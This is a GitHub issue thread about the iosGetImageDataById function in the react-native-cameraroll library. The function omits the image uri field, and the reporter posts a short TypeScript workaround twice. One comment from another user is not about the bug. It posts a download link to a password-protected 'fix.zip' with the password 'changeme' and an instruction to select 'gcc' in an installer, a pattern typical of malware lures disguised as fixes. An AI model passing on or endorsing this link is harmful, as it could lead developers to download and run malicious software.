### ISSUE TITLE
iosGetImageDataById missing uri value from PhotoIdentifier

### ISSUE THREAD

**Issue by slytter** [react-native-cameraroll/react-native-cameraroll#652]
I expect `iosGetImageDataById` to return a full `PhotoIdentifier`. But it doesn't return the `node.image.uri` field. 

This is my returned `PhotoIdentifier` value from a call to `iosGetImageDataById`

`{"node": {"image": {"fileSize": 2170518, "filename": "IMG_5204.HEIC", "filepath": "file:///var/mobile/Media/DCIM/105APPLE/IMG_5204.HEIC", "height": 4032, "isStored": true, "playableDuration": 0, "width": 3024}, "location": {"altitude": 15.402004327525338, "heading": 286.8139037433155, "latitude": 55.67688833333333, "longitude": 12.518603333333333, "speed": 0.11944444643127779}, "modificationTimestamp": 1686378780.1691098, "subTypes": ["PhotoLive"], "timestamp": 1670630676.675, "type": "image"}}
`

It's not a huge problem, since I literally call `iosGetImageDataById` with the image uri as argument. 

But my code expected `iosGetImageDataById` to return a full `PhotoIdentifier` object and it is typed as so. 

env expo version:
 "expo": "~51.0.14",

lib version:
@react-native-camera-roll/camera-roll@7.8.3

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by slytter** [comment]
For context this is my solution:

const fixedPhotoIdentifier = async (id: string) => {
	const photoIdentifier = await CameraRoll.iosGetImageDataById(id, {
		quality: 0.1,
	})
	return {
		...photoIdentifier,
		node: {
			...photoIdentifier.node,
			image: {
				...photoIdentifier.node.image,
				uri: id,
			},
		},
	}
}

**Comment by slytter** [comment]
For context this is my solution:
```
const fixedPhotoIdentifier = async (id: string) => {
	const photoIdentifier = await CameraRoll.iosGetImageDataById(id)

	return {
		...photoIdentifier,
		node: {
			...photoIdentifier.node,
			image: {
				...photoIdentifier.node.image,
				uri: id,
			},
		},
	}
}

```
